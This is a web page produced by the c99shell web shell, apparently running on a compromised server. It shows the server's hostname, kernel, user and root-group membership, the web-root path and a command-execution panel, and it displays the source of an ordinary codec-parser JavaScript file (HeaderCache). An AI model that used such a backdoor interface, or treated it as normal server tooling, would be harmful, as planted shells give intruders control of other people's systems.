Software: Apache. PHP/8.1.30 uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root) Safe-mode: OFF (not secure) /home/picotech/domains/wa.picotech.app/public_html/node_modules/codec-parser/src/codecs/ drwxr-xr-x |
Viewing file: Select action/file-type: /* Copyright 2020-2023 Ethan Halsall This file is part of codec-parser. codec-parser is free software: you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. codec-parser is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this program. If not, see <https://www.gnu.org/licenses/> */ import { getHeader, setHeader, checkCodecUpdate, reset, enable, } from "../constants.js"; export default class HeaderCache { constructor(onCodecHeader, onCodecUpdate) { this._onCodecHeader = onCodecHeader; this._onCodecUpdate = onCodecUpdate; this[reset](); } [enable]() { this._isEnabled = true; } [reset]() { this._headerCache = new Map(); this._codecUpdateData = new WeakMap(); this._codecHeaderSent = false; this._codecShouldUpdate = false; this._bitrate = null; this._isEnabled = false; } [checkCodecUpdate](bitrate, totalDuration) { if (this._onCodecUpdate) { if (this._bitrate !== bitrate) { this._bitrate = bitrate; this._codecShouldUpdate = true; } // only update if codec data is available const codecData = this._codecUpdateData.get( this._headerCache.get(this._currentHeader), ); if (this._codecShouldUpdate && codecData) { this._onCodecUpdate( { bitrate, ...codecData, }, totalDuration, ); } this._codecShouldUpdate = false; } } [getHeader](key) { const header = this._headerCache.get(key); if (header) { this._updateCurrentHeader(key); } return header; } [setHeader](key, header, codecUpdateFields) { if (this._isEnabled) { if (!this._codecHeaderSent) { this._onCodecHeader({ ...header }); this._codecHeaderSent = true; } this._updateCurrentHeader(key); this._headerCache.set(key, header); this._codecUpdateData.set(header, codecUpdateFields); } } _updateCurrentHeader(key) { if (this._onCodecUpdate && key !== this._currentHeader) { this._codecShouldUpdate = true; this._currentHeader = key; } } } |
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]-- |